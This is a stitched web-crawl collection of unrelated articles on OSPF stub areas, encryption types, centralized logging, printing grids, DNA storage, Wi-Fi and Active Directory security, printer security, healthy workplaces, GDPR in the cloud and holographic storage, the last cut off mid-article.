root@Router_2# set protocols ospf area 1 stub no-summaries
All routers in the area need to know it’s a stub area, but only the Area Border Router needs to know to filter out Summary LSAs.
As for Cisco, it’s like this:
R2(config)#router ospf 1 R2(config-router)#area 1 stub no-summary
It’s interesting how neither vendor uses a command that’s something like “area 1 totally-stubby” or something. Instead, we make it a stub area, and then we say “no summary” – in other words, no summary LSAs.
The result of getting rid of all External AND all Summary LSAs is a routing table on Router 1 that’s vastly smaller than before:
(Once again, Cisco will give you a default route here, whereas Junos needs the “default-metric 10” command.)
Woah – every single OSPF route is gone! Is that really correct?
Well, in our topology, yes! It’s a very small network, after all. If there were other routers in Area 1, I’d still be learning those prefixes by OSPF with no problem. But as it happens, the only OSPF prefixes that were previously in Area 1 came from other areas, or from outside of OSPF altogether. And now, they’re all gone!
So, now you know all about the behind-the-scenes mechanics, we can finally give a more accurate definition of a stub area:
A stub area blocks Type 5 LSAs. A totally stubby area blocks both Type 3 AND Type 5 LSAs.
NOT-SO-STUBBY, AND TOTALLY NOT-SO-STUBBY
There’s actually two final types of area to know about: Not-So-Stubby Areas (NSSAs), and Totally Not-So-Stubby Areas. Yep: that is their genuine name, because OSPF is absolutely ridiculous.
Looking one final time at our topology, imagine that Area 2 was also a stub area. Now, think about those BGP prefixes that are being imported into the area as Type 5 LSAs. What’s the definition of a Stub Area? That’s right: it’s an area that blocks Type 5 LSAs. But if Area 2 is a stub area, and a stub area blocks Type 5 LSAs, then how can we import these BGP prefixes?
That’s where NSSAs come in. They’re basically a hack: instead of importing those BGP prefixes as Type 5 LSAs, Router 4 would actually import them as Type 7 LSAs. That’s right: YET ANOTHER LSA TYPE TO REMEMBER!
Type 7 LSAs are called Not So Stubby Area External LSAs – and the amazing thing is, they’re almost exactly identical to Type 5 External LSAs: they allow us to bring in external prefixes, while not breaking the “No Type 5” rule. Then, when Router 3 re-advertises them from Area 2 to Area 0, it converts them from Type 7 to Type 5.
Totally Not-So-Stubby Areas are exactly the same as Totally Stubby Areas – they filter out both Type 3 and Type 5 LSAs, but once again we can use Type 7s to bring in external prefixes.
And with that, we’ve covered the ridiculous world of Stub Area types, and LSA types. You will have your own opinions on whether this is all “very clever” or “absolutely nonsense”. All I’ll say on the matter is that there’s a reason why I prefer IS-IS as an interior routing protocol.
I hope I’ve helped to clarify things a little bit! There’s a lot going on – but once it clicks, it’s really satisfying. By the way, you might have heard of something called a “Stub Network” in OSPF, and wondered whether it’s the same thing as a Stub Area. Confusingly, it turns out they’re different things. I’ve written a post all about it, so click if you’re interested!
If you enjoyed this post and you want to find out when I write more, follow me on Twitter! And if you find my blog useful or entertaining, I’d love you to share it with your friends and co-workers, whether via a Twitter/Facebook/LinkedIn post, or just emailing it to them directly. Spread the world, and I’ll be inspired to write even more posts.
And if you fancy some more learning, take a look through my other posts. I’ve got plenty of cool new networking knowledge for you on this website, especially covering Juniper tech and service provider goodness.
It’s all free for you, although I’ll never say no to a donation. This website is 100% a non-profit endeavour, in fact it costs me money to run. I don’t mind that one bit, but it would be cool if I could break even on the web hosting, and the licenses I buy to bring you this sweet sweet content.
|
<urn:uuid:7896e5c1-437e-4c7c-a3fe-106f1db84021>
|
CC-MAIN-2022-40
|
https://www.networkfuntimes.com/ospf-what-is-a-stub-area/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00046.warc.gz
|
en
| 0.926087 | 5,718 | 2.53125 | 3 |
The basic difference between these two types of encryption is that symmetric encryption uses one key for both encryption and decryption, and the asymmetric encryption uses public key for encryption and a private key for decryption.
Let’s explore each of these encryption methods separately to understand their differences better.
This is said to be the simplest and best-known encryption technique. As discussed already, it uses one key for both encryption and decryption.
This type of encryption is relatively new as compared to symmetric encryption, and is also referred to as public-key cryptography.
Now that we have a basic understanding of both the encryption types, let’s glance through the key differences between them.
While both of these have their own pros and cons, asymmetric encryption is definitely a better choice from the security perspective.
|
<urn:uuid:3377bda1-bae0-4a74-9cfd-d87ba99f0b1e>
|
CC-MAIN-2022-40
|
https://cyware.com/news/exploring-the-differences-between-symmetric-and-asymmetric-encryption-8de86e8a
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00046.warc.gz
|
en
| 0.947693 | 182 | 3.421875 | 3 |
Most if not all modern systems have some way to track or log things that occur in the system from things as simple as a login to all the things that lead up to a kernel panic or application failure. The challenge with log analysis is the number of systems that organizations now depend upon to run their business. With the adoption of containers, hybrid cloud implementations, 3rd party APIs dependencies, and whatever other complexity each organization may have, log analysis has become a daunting task.
What is a log?
A log is simply a timestamp, most likely a severity, and a message stored in a file on a system. This may be over simplifying things as some systems may add more fields to add context. For instance, an application may add an ID so that the log can be referenced from an application trace; for security proposes the originating IP Address where an authentication request came from might be logged. But in the end a log usually looks something like this:
xx/xx/xxxx 00:00:00 – sev 3
Each hardware and software vendor logs in different ways (and sometimes there are difference between their own products) and puts there logs in different areas of a file system. This can add a lot of manual effort before any log analysis can be accomplished. This causes the analysis to take much longer than an organization may want or need. If a system or application is no longer running or usable this could cause a great risk to a business not only because they cannot provide service their clients but there is also the chance for reputational impact to occur.
Compounding the challenge of finding and then analyzing a log is the number of afore mentioned systems an organization must use to run their business. This causes the difficulty of resolving an issue to increase. An issue that could be solved in an hour or less may cause an outage of eight hours or more because technicians must take time to figure out which haystack they need to search to resolve the issue.
The Resolution – Centralized Logging
Syslog has been around for a while and is a way for most infrastructure devices to create a common format within their systems. A Syslog Server was a way to centralize the logs from infrastructure devices to avoid the effort of logging into to each device, searching for a log file, and then analyze the logs. But as technology is more than just infrastructure (i.e. servers, storage, database and network) there is a need to get any logs from all technologies into a central repository in a format that can be queried easily. There are many vendors who have focused on this challenge. Each do things in different ways to address their client’s requirements.
Regardless of vendor, each solution is trying to accomplish the following tasks:
- Exporting logs (from systems and/or applications)
- Parsing logs into a common and/or expected format
- Ingesting logs (either on premise or in the cloud)
- Storing logs
- Ensuring security of logs
These tasks do not necessarily need to be done in order and some vendors tout their approach to either be more cost effective or to ensure all logs are stored or both. In the end the goal is to set up all the systems to export the logs to something so that they can be queried easily by either people or machines. For example, Artificial Intelligence may help look for the fault or trends to help an organization become more proactive. The holy grail in this situation is to use technology to automatically sense indicators before a fault and to automatically remediate the issue so that revenue risk is mitigated.
Evolving Solutions helps clients understand these challenges and plan a path forward to integrate centralized logging into a greater observability strategy. As more organizations leverage technology to drive their business and innovation, understanding what is happening in all the systems involved is critical for informed business decisions. Through Evolving Solutions’ Enterprise Monitoring & Analytics approach, we give structure that enables modernization journeys.
|
<urn:uuid:d14826b8-90f3-49e2-adc9-29797730e9a6>
|
CC-MAIN-2022-40
|
https://evolvingsol.com/centralized-logging/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00046.warc.gz
|
en
| 0.943557 | 805 | 2.8125 | 3 |
Print a Grid
Print a Grid so that you can produce a hard-copy version of your data. When you print a Grid, you define:
- Which columns to print and in which order.
- Printer options: Which printer to use, printer page setup (ex: Paper, orientation, margins). These vary by printer/driver.
- Print layout options: Forced resizing, shading, and page numbering.
Good to know:
- Use the Preview button to preview on your screen what your printed Grid will look like when printed.
To print a Grid:
- In a Grid, click File>Print Grid or Right-click>Print Grid.
The Print Grid window opens.
- Select the columns you want to print by moving them to the Selected Fields box:
Note: By default, all rows are selected.
- Use the Left and Right Arrows to move columns from/to the Selected Fields box.
- Use the Up and Down Arrows to order the printed columns.
- Define the printer options:
- Printer: Select the printer to which to print.
- Page Setup: Click this button to define basic paper setup options (ex: Paper, orientation, margins).
- Font: Click this button to define the font, font style, and font size for the text on the printed Grid.
Note: Page Setup and Font options vary according to the driver of the selected printer.
- Define the print layout options:
- Force width to single page: Select this box to resize the printed Grid so that it fits on a single page (does not off trail off the edge.
- Shade alternate rows: Select this box to add a gray shade to every other row of the Grid.
- Number pages: Select this box to add a page number to the footer of the printed page.
- Preview: Click to this button display a preview of the Grid before you print it.
- Click OK.
|
<urn:uuid:61182cd6-1cd7-4d36-9b7c-6e5effda1dcb>
|
CC-MAIN-2022-40
|
https://cherwellsupport.com/webhelp/es/5.0/5447.htm
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00247.warc.gz
|
en
| 0.744484 | 405 | 3.046875 | 3 |
By Randy Weis, Consulting Architect, LogicsOne
Molecular and DNA Storage Devices- “Ripped from the headlines!”
-Researchers used synthetic DNA encoded to create the zeros and ones of digital technology.
-MIT Scientists Achieve Molecular Data Storage Breakthrough
-DNA may soon be used for storage: All of the world's information, about 1.8 zettabytes, could be stored in about four grams of DNA
-Harvard stores 70 billion books using DNA: Research team stores 5.5 petabits, or 1 million gigabits, per cubic millimeter in DNA storage medium
-IBM using DNA, nanotech to build next-generation chips: DNA works with nanotubes to build more powerful, energy-efficient easy-to-manufacture chips
Don’t rush out to your reseller yet! This stuff is more in the realm of science fiction at the moment, although the reference links at the end of this post are to serious scientific journals. It is tough out here at the bleeding edge of storage technology to find commercial or even academic applications for the very latest, but this kind of storage technology, along with quantum storage and holographic storage, will literally change the world. Wearable, embedded storage technology for consumers may be a decade or more down the road, but you know that there will be military and research applications long before Apple gets this embedded in the latest 100 TB iPod. Ok, deep breath—more realistically, where will this technology be put into action first? Let’s see how this works first.
DNA is a three dimensional media, with density capabilities of up to a zettabyte in a millimeter volume. Some of this work is being done with artificial DNA, injected into genetically modified bacteria (from a Japanese research project from last year). A commercially available genetic sequencer was used for this.
More recently, researchers in Britain encoded the “I Have a Dream” speech and some Shakespeare Sonnets in synthetic DNA strands. Since DNA can be recovered from 20,000 year old wooly mammoth bones, this has far greater potential for long term retrievable storage than, say, optical disks (notorious back in the 90s for delaminating after 5 years).
Reading the DNA is more complicated and expensive, and the “recording” process is very slow. It should be noted that no one is suggesting storing data in a living creature at this point.
Molecular storage is also showing promise, in binding different molecules in a “supramolecule” to store up to 1 petabyte per square inch. But this is a storage media in two dimensions, not three. This still requires temperatures of -9 degrees, considered “room temperature” by physicists. This work was done in India and Germany. IBM is working with DNA and carbon nanotube “scaffolding” to build nano devices in their labs today.
Where would this be put to work first? Google and other search engines, for one. Any storage manufacturer would be interested—EMC DNA, anyone? Suggested use cases: globally and nationally important information of “historical value” and the medium-term future archiving of information of high personal value that you want to preserve for a couple of generations, such as wedding video for grandchildren to see. The process to lay the data down and then to decode it makes the first use case of data archiving the most likely. The entire Library of Congress could be stored in something the size of a couple of sugar cubes, for instance.
What was once unthinkable (or at least only in the realm of science fiction) has become reality in many cases: drones, hand held computers with more processing power than that which sent man to the moon, and terabyte storage in home computers. The future of data storage is very bright and impossible to predict. Stay tuned.
Here is a graphic from Nature Journal (the Shakespeare Sonnets), “Towards practical, high-capacity, low-maintenance information storage in synthesized DNA” http://www.nature.com/nature/journal/vaop/ncurrent/full/nature11875.html#/ref10
Click here to learn more about how GreenPages can help you with your organization's storage strategy
Researchers used synthetic DNA encoded to create the zeros and ones of digital technology.
MIT Scientists Achieve Molecular Data Storage Breakthrough
DNA may soon be used for storage
Harvard stores 70 billion books using DNA
IBM using DNA, nanotech to build next-generation chips
|
<urn:uuid:09d337d2-0cec-4d22-9232-be981f905c3f>
|
CC-MAIN-2022-40
|
https://www.greenpages.com/blog/storage-and-information-management/the-newest-data-storage-device-is-dna
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00247.warc.gz
|
en
| 0.909255 | 982 | 3.34375 | 3 |
Wi-Fi has been part of our daily lives for more than 20 years. First used to connect computer devices like laptops in enterprise environments, it quickly expanded to every single home, office, and public place to connect mobile devices to a network – local or Internet – for management and data exchange. This has become even more prominent with the recent exponential growth of the Internet of Things (IoT).
Understanding Your End-User Wi-Fi Risks
It is important to be careful as Wi-Fi is one of the favorite methods for hackers to steal valuable information from our devices, either personal (e.g., credentials, credit card information, etc.) or work-related (e.g., emails, classified documents, etc.).
There are dozens of well-proven attacks relying on Wi-Fi. The most common are Man-in-the-Middle (MitM) attacks, where an attacker manages to intercept communications between two parties to alter them, while these parties believe they are legitimately exchanging information between themselves – similar to impersonation. Some of the techniques used include “DNS spoofing” or “DNS hijacking,” where the attacker manages to intercept DNS queries and return an alternative address in order to redirect traffic to a rogue server under his control, instead of the legitimate one.
Another is eavesdropping, also known as “sniffing,” where an attacker is secretly listening to the communications between two parties to gather value information, typically user credentials, credit card information, or anything that can be extracted from unsecured data transmissions. a
Protect Your End-Users’ Devices
Considering you cannot trust or control any Wi-Fi network except your own, one of the best measures you can take to ensure corporate data is not compromised is to secure your devices. From an enterprise perspective, you want to prevent any data on your managed devices from travelling over an unsecured, untrusted network.
However, you should consider the type of devices your users are using, the ownership, and the management mode before you can determine what is available to secure them as much as possible.
With Bring Your Own Device (BYOD) devices, you cannot control the device itself, only the work part, so you want to make sure that even if the device and/or connection is compromised, that all corporate information is safe. In this case, the best option would be to use a containerized solution for your work apps/data to ensure data will be safe both at rest and in transit. This way communications cannot be intercepted, nothing can be extracted by a malicious entity, and all company data remains safe.
Managing Corporate-Owned Devices
With corporate-owned devices, your UEM software should already include some Wi-Fi related policies and profiles to help control which Wi-Fi networks your devices can connect to and how. In terms of management modes, we have mainly two options: Corporate-Owned Personal Enabled (COPE) and Corporate-Owned Business Only (COBO), depending how much room we want to leave the user to install personal apps and store personal documents on the device.
Ensure corporate devices are configured and provisioned automatically on all managed devices using Wi-Fi configuration profiles so work data will only be travelling over secure and trusted networks.
The last step is to ensure all work-related data (COPE) or even all device data (COBO) is transmitting over a secure connection to your own back-end servers, either located behind firewall, on-premises, or out in the open on the Internet. For that, your UEM vendor should have either a containerized solution, a VPN-like solution, and/or its own infrastructure to ensure communications are secured, end-to-end.
Securing Corporate-Owned Devices
In addition to that, there are extra steps you can take to secure corporate-owned devices even further when required for specific use cases.
For example, you can control which Wi-Fi networks’ enterprise devices can connect and what type of information is transmitted by not allowing end-users to manually add new Wi-Fi networks (e.g., home office), connect to any public captive network (e.g., mall, hotel), or even blacklist known untrusted networks (e.g., carrier-provisioned).
To prevent data leakage, it is also recommended to disable direct Wi-Fi (when supported), so a device cannot communicate with another directly, point-to-point, and stream/transfer data without any control or monitoring over that connection.
Finally, in some extreme situations like regulated environments where security is a must, it is possible to disable Wi-Fi completely on the device so cellular network is used instead, eventually with a dedicated Access Point Name (APN) to ensure work data is still transmitting over a secure connection back to your internal network.
Note: Policy rules will differ depending on the options available, the type of device (iOS, Android), and UEM solution(s), but these should be available in most cases.
If you have any questions or concerns about how to improve your security posture, please feel free to contact us.
(C) Rémi Frédéric Keusseyan, Global Head of Training, ISEC7 Group
|
<urn:uuid:af21b0a4-4ddc-4acd-8a41-647c18a86462>
|
CC-MAIN-2022-40
|
https://www.isec7.com/2021/02/26/everyday-security-risks-wi-fi/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00247.warc.gz
|
en
| 0.929385 | 1,099 | 2.796875 | 3 |
Unstructured data is any data that is not stored in a pre-defined schema, and can include Word, text and PDF documents, photos, videos, MP3s, emails, data obtained via social media platforms and various types of personal data.
According to a forecast by the IDC, 80 percent of global data will be unstructured by 2025.
Unlike a relational database, for example, unstructured data can be difficult to identify, and thus protect. This is likely to be the main reason why 65% of organizations can’t analyse or categorize all the consumer data they store, according to the Data Security Confidence Index.
Additionally, according to an article by itproportal.com, 65% of businesses are collecting too much data, and can’t find the time or resources to analyse all of it. With this in mind, a good place to start would be to remove or achieve any data that is not necessary for day-to-day business operations.
Perhaps the simplest and most effective way to identify unstructured data – especially data that is sensitive, is to use data discovery and classification tool. However, in order for these tools to be effective, we need to ensure that the access control protocols and policies we have in place have been hardened, as to prevent users from accessing resources that are not relevant their role.
90% of organizations across the globe use Microsoft Active Directory (AD) as their primary access control solution. AD enables administrators to organize users into logical groups and subgroups, with each group having its own set of permissions.
Before we can secure our unstructured data, we must carefully review these groups and their permissions, and “harden” them to ensure that users are not able to access resources they do not require. Below are some basic steps to follow.
Use Passphrases as Opposed to Complex Passwords
Naturally, strong passwords are the pinnacle of effective data security. It is becoming more popular to use passphrases as opposed to passwords as they are easier to remember, yet still sufficiently complex.
If the passphrase is easy to remember, the user may not need to write it down, thus making it more secure.
A common practice is to choose at least three unrelated words, and insert numbers and special characters between them, for example, tree4door!cat#boat, or summer42shirt/bulb.
Clean up Unused Objects
To ensure basic AD hygiene, some initial housekeeping is required. This involves conducting a review of all users, groups and computers that are no longer being used. This will not only help to reduce the attack surface but will also make it easier to manage.
When dealing with objects that are used infrequently, you will need to do some research into what these objects are, who is the owner of the objects, how they are being used, and why they are necessary. You can use this information to add some context to the object, for future reference.
Lock Down Service Accounts
A service account is a special type of account which allows applications to authenticate to AD, and thus gain access to the underlying operating system. These types of accounts are frequently targeted by attackers as they are rarely monitored, have elevated privileges, and use passwords which don’t expire.
It is crucial that service accounts are closely monitored, and that access permissions have been hardened. You may need to check with the vendor to find out what privileges the application needs. Any passwords associated with service accounts need to be periodically rotated.
Monitor and Remove All Other Admin-Like Permissions
Permissions which allow users to reset passwords, make changes to group memberships, and make changes to accounts or objects that facilitate replication, must also be locked down to prevent unauthorised access.
Likewise, employees should not be allowed to access admin accounts on their workstations, as an attacker might gain control of the workstation, install malicious software, and so on. Any permissions that are not required, must be removed and permissions that cannot be removed must be carefully monitored.
Administrators need to be alerted, in real-time, when they change, and by whom.
Eliminate Permanent Membership in Security Groups
Were an attacker to gain access to security groups such as Enterprise Admin, Schema Admin, and Domain Admin, they will have free reign to do pretty much anything that want. As such, it is crucially important that access to these groups is immediately revoked when they are no longer relevant.
Since Enterprise Admin and Schema Admin groups are not used often, restricting access to these groups won’t be much of a problem. However, Domain Admin groups are typically used more frequently, and so you will need to adopt a pro-active approach to granting and revoking permissions.
Data Discovery and Classification
So now that we’ve reviewed all permissions to ensure that accounts are granted the least privileges they need to carry out their role, the next step is to classify our unstructured data. Naturally, if we are to stand any chance of keeping our data secure, we need to know exactly what data we have, where it is located, and how sensitive the data is.
The good news is that we don’t have to do this manually. Most sophisticated auditing solutions provide tools which can automatically discover and classify unstructured data containing a wide range of data types, including Social security numbers, payment card information, protected health information, and so on.
We also need an inventory of important events involving our unstructured data, which includes information about who, what, where and when, the events took place. A real-time auditing solution can keep track of all changes to AD permission, as well as any files and folder containing sensitive data.
Any suspicious events will be reported to the relevant personnel where they can review the changes and take action accordingly. Such events will include permission and configuration changes, files and folders that have been accessed, moved, copied, modified or deleted.
Attackers will often try to hijack user accounts that are inactive, as they provide them with a way to infiltrate a network without arousing too much suspicion. Fortunately, most real-time auditing solution can automatically detect and manage inactive user accounts.
If you would like to see how the Lepide Data Security Platform combines data classification, user behavior analytics and access governance into one scalable solution, schedule a demo with one of our engineers today.
|
<urn:uuid:35f29d25-a8f2-42d2-bfbb-357d5757a3e7>
|
CC-MAIN-2022-40
|
https://www.lepide.com/blog/hardening-active-directory-and-securing-unstructured-data-stores/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00247.warc.gz
|
en
| 0.946878 | 1,329 | 3 | 3 |
You’ve probably protected or encrypted your network, computer, and email. However, did you know that your printer and copier are just as much of a security liability as any other device in the office?
Network printers and copiers are the machines that often handle sensitive documents and information, providing an access route to other computers or networks. Printers have become more complex now able to connect to the Internet, have increased random access memory (RAM), integrated disk drives, and multi-functionality. Each of these is a potential security vulnerability that should be taken more seriously. Below, we’ve highlighted the five main threats to printers as well as how to step up your security for them.
5 Main Cybersecurity Threats and Vulnerabilities for Shared Printers
The more advanced, business-class multi-functioning printers and copiers are subject to a greater number of threats since they are computers with their hard drive, operating system, and direct network connection. Below are a few liabilities to a lack of printer security:
- Document Theft/ Snooping
- Unauthorized Changes to Settings
- Saved Copies on Internal Storage
- Eavesdropping on Network Printer Traffic
- Printer Hacking via the Network or Internet
These vulnerabilities range from the overly simplified to the expert hacker. It is easy for anyone to walk over to a printer and pick up a document that belongs to someone else. However, it can be just as easy to hack a printer if it is connected to a network.
How to Protect Against Printer Vulnerabilities
One of the easiest ways to prevent document theft, unauthorized access to stored documents, or a misuse of the printer’s connection is to place the printer in a visible, open area. Additionally, try designating printers for management and other sensitive departments so that you can keep those machines more secure. Finally, buying a printer that requires users to provide some form of identification before it prints is another way to decrease the chances of a cyber hack.
Carson Inc. Combats Cyber Threats
Don’t sacrifice your security for convenience. Carson Inc. has been helping its customers fight the battle against cyber threats for more than 22 years. Our team consists of Information Assurance (IA) experts with advanced degrees and technical certifications, including CISSP, CISA, LPT, GWASP, and ISO 27001. Our staff has in-depth knowledge of IT security statutory and regulatory guidance.
|
<urn:uuid:d2ae8f82-1794-4eac-bca4-9bd1460bd3d1>
|
CC-MAIN-2022-40
|
https://www.carson-saint.com/2014/10/22/2015-5-7-operational-technology-shared-printer-security-risk/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00247.warc.gz
|
en
| 0.941579 | 503 | 2.546875 | 3 |
“We shape our buildings; thereafter they shape us” – Winston Churchill.
Do we know that people spend more than 90% of their lives indoors? And if we are spending more time indoors, then it is evident that our workplaces have a significant ability to influence our overall health and wellbeing.
As building professionals, how we design, build, and operate our buildings can make a difference for millions of people. According to the WELL building institute, “we must invest in people for a higher return of investment” in terms of business value.
Over the last 20 years, the industry has changed significantly, and more people are now working in offices, meaning that it is more important that employees have a healthy office to work at. Some studies show that more restorative offices with better air quality make people sharper and brighter. The ongoing pandemic has forced businesses and companies to consider how crucial it is to invest in people and the environment.
Additionally, we are burdened with a real problem regarding poor air quality in our external environment. So, it becomes much more crucial to have our indoors which can serve us with better air quality.
The buildings thus play a crucial role in the spread of disease. If the facilities are operated smartly, they can also help us fight against it. As we prepare for the new normal, we need to evaluate our buildings and indoor environment’s impact on our health and wellbeing. The best part is that we don’t have to undergo an extensive renovation or construct a new building to incorporate healthy workplaces.
Some of the things which are easily doable, and which can make a significant impact. These include the following measures:
1. Air Quality
• Assess the ventilation and fresh air intake as per ASHRAE standards.
• Assess and maintain air treatment systems, change filters regularly, upgrade to MERV 13 or above, and have carbon filters.
• Test and monitor air quality, its particle count & CO2 levels.
• Integrate live plants throughout the space.
• Promote a smoking-free environment.
2. Water Quality
• Test and monitor water quality
• Maintain treatment systems and change filters regularly
• Apply water conservation strategies such as Low flow indoor plumbing fixtures such as faucets and showerheads.
• Reduce surface contact (e.g., foot grabs for doors, etc.).
• Improve cleaning practices and product selection using nontoxic and green products.
• Coating high touch surfaces (countertops, handles, doorknobs, elevator buttons, light switches, etc.) for antimicrobial activity.
• Indoor garbage cans having lids and hands-free operation and Pest reduction measures.
• Encourage movement throughout the workplace and exercise on breaks
• Change posture to stand/sit at workstations.
• Using public transport/walking/biking to workplaces.
• Using staircase instead of lifts and escalators.
• Bring as much natural light as possible and providing shading for natural daylight for glare control.
• Set temperate within the comfort zone of 23 to 27 degrees and relative humidity as 40 to 60%.
• Assess sound travel and add acoustic panels wherever needed and are easily integrated.
• Companies are providing local, organic, whole food with nutritional information.
• Provide storage/heating for healthy home-packed lunch.
• Provide communal garden space for herbs and vegetables.
7. Enhancing employee experience
• Adding artwork, color, and texture to stimulate mental health
• Choose the right kind of biophilic elements which can increase people’s connectivity to the natural environment.
Providing employees with an efficient and comfortable work environment helps create a healthy building that will foster creativity, increase engagement and collaboration, and inspire employees to be their best. A workplace strategy that combines sustainable practices with wellness-driven concepts thus becomes paramount.
As building professionals, we have a responsibility to integrate sustainable solutions to our design and construction practices which can improve public health and wellbeing and at the same time add value-added services for our clients.
By Bharat Tagra, Director – Project Management, Colliers India
Bharat is responsible for leading the fit-out project management business for North & East India as a part of Occupier services.
With over 19 years of experience operating in a fast paced, always demanding and ever – changing environment of commercial sector, Bharat has demonstrated as a clear thinker and having an ability to remain calm and consistent under pressure.
For more information, please visit:
|
<urn:uuid:0561424c-eced-48a5-a891-61da6a71fed7>
|
CC-MAIN-2022-40
|
https://www.dailyhostnews.com/building-indoors-in-pursuit-of-creating-a-healthy-workspace
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00247.warc.gz
|
en
| 0.932933 | 950 | 2.578125 | 3 |
What’s the General Data Protection Regulation, known as GDPR, have to do with the cloud? The answer: a lot.
Personal data — any data that can identify a person — is increasingly making its way into the cloud. For example, organizations are using IoT-connected devices, AI, and RFID technologies to collect, use, and integrate personal information into products and are storing and processing that data in the cloud.
GDPR provides updated legislation throughout the EU to protect that personal data. It covers many of the previously unforeseen ways that personal data is gathered and used, which includes the cloud.
It simplifies the regulatory environment for international business by unifying the regulation within the EU. The provisions are consistent across all EU member states, which means companies have just one standard to meet within the EU. It also includes tough fines for non-compliance and breaches.
Who’s Subject to GDPR Compliance
The GDPR requirements aren’t just for EU companies. They apply to any organization doing business in the EU or that processes personal data originating in the EU. The data can be about residents or visitors. Because the data may be processed outside the EU, many U.S. companies are subject to the GDPR regardless of their base of operations.
The GDPR also defines compliance responsibility for data controllers and data processors. The data controller defines how the data is processed and why, and is responsible for making sure outside contractors comply. Data processors are the internal groups that maintain and process personal data records. Or, it could be a third-party company that performs all or part of those activities.
The GDPR holds both controllers and processors liable for non-compliance. That means both an organization and its partner organization, such as a cloud provider, would be subject to non-compliance penalties even if the partner is the one at fault. That’s why many companies using cloud services go with organizations like AWS. All AWS services comply with the GDPR. In addition to benefiting from all of the measures that AWS takes to maintain GDPR compliance and high-level security, organizations can deploy AWS services as a key part of their GDPR compliance plans.
What Your Organization Must Do to Be GDPR Compliant
If your organization is subject to GDPR compliance, the following are some of the things you’ll likely need to do:
• Determine what areas of your organization fall under the GDPR’s scope. Is your organization a data controller, processor, or both? The category it falls under will determine its compliance requirements under GDPR.
• Identify what data you have, what you do with it, where it’s being stored and/or processed, who has access to it, and where it’s being exported outside the organization. Audit your current compliance position against the GDPR’s requirements. You may need an outside organization with GDPR compliance expertise to help with this step.
• If there are any compliance gaps, determine what it will take to fix them. If you use an outside organization for the audit, it should be able to help you with this step as well. Then bring your existing policies, processes, procedures, and technical and security controls into line with the GDPR’s requirements. Again, this may require the assistance of an organization with GDPR compliance experience.
• Keep in mind that GDPR compliance is an ongoing project. Conduct periodic internal audits and regularly update your data protection processes.
Meeting the GDPR requirements can be arduous and time-consuming. However, the investment will do more than help you meet the GDPR compliance requirements and avoid costly fines. It will help strengthen your overall IT security posture and distinguish your organization’s value proposition from that of its competitors.
That’s why working with an organization such as ClearScale can be invaluable. ClearScale understands GDPR compliance and has extensive experience as it relates to cloud environments — including the AWS Cloud.
As an AWS Premier Consulting Partner, we’re among the top AWS consulting partners globally that have extensive experience in deploying customer solutions on AWS, a strong bench of certified technical consultants, multiple AWS competencies, expertise in project management, and a healthy revenue-generating consulting business on AWS.
ClearScale can’t ensure your organization is GDPR-compliant, but we can work with you to implement the infrastructure and technical controls necessary to meet many of your company’s GDPR compliance and cloud security requirements. We’ve demonstrated success in building solutions for a wide range of organizations that store, process, transmit, and analyze personal data.
Learn more about what we can do for your company. Download our eBook Next Generation Cloud Security for Your AWS Environment.
|
<urn:uuid:4e9ea335-74a0-4e7e-a1e5-00e91ce2f98e>
|
CC-MAIN-2022-40
|
https://blog.clearscale.com/meet-gdpr-compliance-in-the-cloud/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00247.warc.gz
|
en
| 0.932538 | 1,077 | 2.546875 | 3 |
Every enterprise needs archival storage to meet compliance requirements and address litigation issues, but "deep" archiving remains a challenge. Nobody wants to keep discs powered, spinning and serviced for up to 50 years or more. Tape is removable and securable, but tape carries its own long-term readability and reliability concerns. Optical storage is emerging as an attempt to fill this gap, and holographic storage may emerge as the next vehicle for long-term offline archival storage, bringing a mix of large capacity and decades of media stability.
However, holographic storage technology is far from being the next big thing. It has been on the drawing boards for years, and even though most of its technological components are well-founded in current CD/DVD devices, practical holographic storage systems are still in development. In fact, there are really only two principal suppliers. This article examines holographic storage technology, highlights its anticipated deployment and considers the potentially rocky road ahead for this high-capacity optical storage scheme.
What is holographic storage?
Holographic storage works by storing a sequence of discrete data snapshots within the thickness of the media. The storage process starts when a laser beam is split into two signals. One beam is used as a reference signal. Another beam, called the data-carrying beam, is passed through a device called a spatial light modulator (SLM) which acts as a fine shutter system, passing and blocking light at points corresponding to ones and zeroes. The reference beam is then reflected to impinge on the data-carrying beam within the media. This creates a three-dimensional refraction pattern (the "hologram") that is captured in the media. Holographic storage uses circular media similar to a blank CD or DVD that spins to accept data along a continuous spiral data path. Once the media is written, data is read back using the reference beam to illuminate the refraction.
This three-dimensional aspect of data recording is an important difference between holographic storage and conventional CD/DVD recording. Traditional optical media uses a single laser beam to write data in two dimensions along a continuous spiral data path. In contrast, prototype holographic storage products save one million pixels at a time in discrete snapshots, also called pages, which form microscopic cones through the thickness of the light-sensitive media. Today's holographic media can store over 4.4 million individual pages on a disc.
Today, holographic storage is a Worm technology that relies on light-sensitive media housed in removable protective cartridges. Although rewritable media and drives will appear in the next few years, much like the progression from CD-R to CD-RW or from DVD-R to DVD-RW, experts note that the most likely application for Worm media is for long-term archiving.
What are the benefits and drawbacks of holographic storage?
